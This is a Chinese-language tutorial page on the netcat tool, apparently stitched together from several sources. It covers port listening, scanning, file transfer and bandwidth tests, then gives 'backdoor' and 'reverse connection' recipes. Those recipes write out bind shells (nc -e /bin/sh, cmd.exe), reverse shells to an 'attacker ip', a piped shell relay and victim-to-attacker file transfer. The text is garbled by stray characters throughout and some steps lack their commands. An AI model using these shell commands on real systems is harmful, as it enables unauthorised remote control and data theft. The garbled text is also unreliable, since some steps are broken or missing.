NetCat号称网络工具中的瑞士军刀,可以用它来做很多有如兆用事情,比如侦听端口、端口扫描、传输文件、网络测速等等
机器IP:118.178.255.158
机器IP:47.96.151.115
可以用这个和妹子聊天,比阅后即焚更安全!
监听UDP端口
-w2 设置2秒超时时间
测试下来,nc传文件与scp传雹销文件速度无差别,用tcpdump查看数据包个数也差不多,nc传输文件比scp好在不需要输入密码.
测试网速原理就是采用文件传输方式,把来自一台机器的/dev/zero一直发送给另外一台的机器的/dev/null,这样测试网速因为不需要写磁盘会更精确.
接收端
发送端
在接收端测试网速
阿里云测试机网速峰值为5Mbps,换算一下 5*1024/8 =640KB/s,与测试结果的recv相差不大,说明阿里云没有骗人。
受控端
控制端
这是否就意味我没有远程机的root账号而能做源橡游很多事了?
最近在做取证相关工作,头大~其键猜中用的比较多的命令为netcat
可以直接通过起一个端口传文件,只需要在传输双方安装netcat工具即可李宴
netcat命令 参考文章 https://zhuanlan.zhihu.com/p/83959309
起一个监听端口
服务端向客户端发送文件
需稿扰型要开放对应防火墙的权限
NC(netcat)的使用方法!连接到某处:nc [-options] hostname port[s] [ports].....
监听某端口等待连接:nc -l -p port [options] [hostname] [port] -options
-d 后台运行
-e prog 程序重定向,一旦有连接,就执行绑定的程序。
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i 设定延时时间。
-l 监听方式,等待连入。连接完成后,结束监听。
-L 监听方式,等悔纯滑待连入。连接完成后,继续监听。
-n 只能使用ip地址。
-o file 指定要传送的16进制代码。
-p port 指定本地的端口号。
-r 随意指定本地或远程端口号。
-s addr 本地的源地址。
-t 回显telnet信息。
-u UDP方式。
-v 显示详细的信息,-vv 可获取更详细的信息。
-w 指定超时的时间。
-z 用于scan。
以上就是nc的一些参数和选项,注意,这是nt版本的nc。如果是*nix的需要自己编译。也都差不多,只是netcat.c默认是没有-t和-e这个两个参数裤行,要改。
看看它能干些什么,(偶就知道这些)
1.端口的刺探:
nc -vv ip port
2.扫描器
nc -v -w 5 ip port-port
nc -v -z ip port-port
3. 后门
victim machine:
nc -l -p port -e cmd.exe
nc -l -p port -e /bin/sh
attacker machine:
nc victim ip -p port
得到一个shell。
4.反向连接
attacker machine:
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port
或者:
attacker machine:
nc -vv -l -p port1 /*用于输入*/
nc -vv -l -p prot2 /*用于显示*/
victim machine:
nc attacker ip port1 | cmd.exe | nc attacker ip port2
nc attacker ip port1 | /bin/sh | nc attacker ip port2
5.传送文件:
attacker machine <-- victim machine
nc -d -l -p port <path file /*attacker machine*/
nc -vv attacker ip -p port >path file /*victim machine*/
attacker machine -->victim machine
nc -vv -l -p >patm file/*victim machine*/
nc -d victim ip -p port <path file 碧腊 /*attacker machine*/
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)